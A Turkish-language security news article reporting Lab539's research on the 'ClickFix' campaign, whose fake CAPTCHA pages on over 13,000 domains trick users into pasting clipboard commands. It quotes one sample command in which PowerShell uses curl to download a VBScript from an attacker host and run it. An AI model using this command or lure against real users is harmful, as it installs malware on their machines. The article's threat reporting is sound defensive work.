2025’in ortalarında Lab539 araştırmacıları, “ClickFix” adı verilen yeni, tarayıcı tabanlı kötü amaçlı yazılım kampanyasında beklenmedik bir artış gözlemledi.
Temmuz ayında sessizce ortaya çıkan tehdit, kullanıcıları kendi cihazlarında kötü amaçlı komutlar çalıştırmaya teşvik etmek için tasarlanmış 13.000’den fazla benzersiz alan adını kaydederek erişim alanını hızla genişletti.
Saldırı, yanıltıcı derecede zararsız web istemleri yoluyla yükleri iletmek için Cloudflare’in arkasındaki önemli bir kısım da dahil olmak üzere, tehlikeye atılmış veya düşük maliyetli barındırma altyapısından yararlanıyor.
Bu sitelerle karşılaşan kullanıcılara, panolarından bir komut çalıştırmaları talimatı verilmeden önce, saldırganlara rastgele komut dosyaları veya yürütülebilir dosyalar dağıtma yeteneği veren bir CAPTCHA sorulur.
Başlangıçta, ClickFix alan adlarının hacmi, geniş düşman faaliyeti denizinin ortasında önemsiz görünüyordu.
Ancak Ağustos ortasına gelindiğinde dikkat çekici bir artış, birçok tehdit istihbaratı platformunda alarmların artmasına neden oldu.
Lab539 analistleri, “doğrulama” adımları adı altında kötü amaçlı yazılım dağıtımını önden yükleyen ön uç sitelerin aniden çoğaldığını belirtti; bu, ClickFix’i daha geleneksel kimlik avı veya sulama deliği saldırılarından ayıran bir özelliktir.
Etki alanı kaydının ölçeği, gelişmiş kalıcı tehdit aktörlerinin tercih ettiği manuel kurulum yerine, muhtemelen kullandıkça öde kayıt şirketi hizmetleri ve yeniden satılan barındırma tarafından desteklenen otomatik bir provizyon hattını öneriyordu.
Cloudflare’in, gözlemlenen ClickFix alan adlarının yaklaşık %24’ünü oluşturan barındırma sağlayıcıları arasındaki hakimiyetine rağmen, kampanyanın yaklaşık 500 diğer sağlayıcıdan oluşan uzun kuyruğu, basit engelleme listelerinden kaçınmak için çeşitli altyapıların stratejik bir şekilde kullanıldığını ortaya koyuyor.
Amerika Birleşik Devletleri, Almanya, Endonezya ve Brezilya’daki bölgesel VPS hizmetleri, hem küresel dağıtımı hem de üçüncü taraf sunucuların fırsatçı uzlaşmasını yansıtacak şekilde belirgin bir şekilde öne çıkıyor.
Çoğu durumda saldırganlar, kötü amaçlı trafiği meşru DNS kayıtlarıyla harmanlamak için eski veya yanlış yapılandırılmış alt alan adlarını (onlarca yıllık akademik veya belediye ana bilgisayarları gibi) yeniden kullanır.
.webp)
Enfeksiyon Mekanizması ve Yük Dağıtımı
Temel enfeksiyon mekanizması, kullanıcının farkında olmadan bir terminale yapıştırdığı bir komutu yerleştirmek için tarayıcının pano API’sinden yararlanmaya dayanır.
CAPTCHA tamamlandığında site, panoya aşağıdakine benzer bir PowerShell komut dizisi yazar: –
cmd /c start /min powershell -Command curl.exe -s https://cf-unstable.mediacaptcha.txt -o $env:TEMP\captcha.vbs; Start-Process $env:TEMP\captcha.vbsBu tek satır, daha fazla kullanıcı etkileşimi olmadan bir VBScript verisini indirir ve çalıştırır; bu da kampanyanın istismar zincirleme yerine sosyal mühendisliğe verdiği önemin bir örneğidir.
Varyasyonlar arasında doğrudan yürütülebilir indirmeler ve gizlenmiş komut dosyaları bulunur; bu da birden fazla operatörün ClickFix çerçevesini kullandığını gösterir.
Bu mekanizmanın her yerde bulunması, otomatik alan adı kaydı ve küresel barındırma varlıkları ile birleştirildiğinde, minimum düzeydeki teknik karmaşıklığın hala büyük ölçekli izinsiz giriş fırsatları yaratabileceğinin altını çiziyor.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
